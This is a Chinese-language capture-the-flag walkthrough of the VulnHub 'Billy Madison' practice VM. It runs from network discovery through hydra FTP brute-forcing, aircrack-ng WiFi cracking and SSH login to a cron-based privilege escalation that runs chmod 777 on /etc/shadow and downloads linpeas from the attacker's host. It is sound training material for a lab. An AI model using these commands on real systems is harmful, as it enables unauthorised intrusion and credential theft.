VulnHub Billy Madison 渗透测试实战
网络主机探测
使用网络发现工具定位目标主机:
$ sudo netdiscover -r 192.168.234.0/24
扫描完成!显示唯一主机列表
捕获3个ARP请求/响应包,来自3台主机
_________________________________________
IP地址 MAC地址 计数 长度 MAC厂商/主机名
-----------------------------------------
192.168.234.45 00:0c:29:1f:87:52 1 60 VMware, Inc.
192.168.234.196 20:1e:88:ad:fc:55 1 60 Intel Corporate
192.168.234.177 c6:62:32:b7:68:66 1 60 未知厂商
确定目标机器IP为192.168.234.45
端口与服务扫描
执行全面端口扫描:
sudo nmap -p- 192.168.234.45 --min-rate 8000
通过提高扫描速度快速获取结果
初始访问获取
在SMB服务中发现文本文件,提示Eric的后门已关闭。
通过telnet连接23端口获得重要线索:
telnet 192.168.234.45 23
***** 哈哈!你被暂时禁止了,Billy男孩!
顺便说一句,我抓到你想入侵我的WiFi - 但笑话在你身上!
我不再使用像rkfpuzrahngvat这样的ROT13密码了!
Madison酒店现在是我的了!*****
对ROT13加密字符串解码后获得Web路径,从中发现:
- Veronica使用姓名作为密码
- 存在流量文件,文件名与Veronica相关
生成专用密码字典:
cat /usr/share/wordlists/rockyou.txt | grep veronica > passwords.txt
通过目录爆破发现流量文件,分析得到:
- Eric拥有FTP账户
- 系统使用敲门服务,需要特定端口序列激活FTP
执行敲门序列后连接FTP服务,在Eric目录发现.note文件,记载后门激活方法和SSH密码位置。
爆破Veronica的FTP密码:
hydra -l veronica -P passwords.txt 192.168.234.45 ftp
登录后下载.eml邮件和.cap流量文件,分析发现WiFi流量,邮件提示WiFi密码即Eric的SSH密码。
破解WiFi密码:
aircrack-ng network.cap -w /usr/share/wordlists/rockyou.txt
同时激活后门服务:
telnet 192.168.234.45 2525
重新扫描发现新服务,使用凭据eric:triscuit*建立SSH连接。
权限提升
本地启动HTTP服务传输提权脚本:
# 攻击机
python3 -m http.server 80
# 目标机
wget http://192.168.234.130/linpeas.sh
chmod +x linpeas.sh
运行脚本发现可疑文件:
eric@BM:/tmp$ md5sum /usr/local/share/sgml/donpcgd
cd3621324a40c20e54aad9ecef2f6ed5
搜索发现漏洞利用方法,执行提权:
touch /tmp/rootme
chmod +x /tmp/rootme
/usr/local/share/sgml/donpcgd /tmp/rootme /etc/cron.hourly/rootme
echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme
监控文件权限变化:
watch -n 5 "ls -la /etc/shadow"
生成root密码哈希:
mkpasswd -m sha-512 password123
替换shadow文件哈希值,完成权限提升。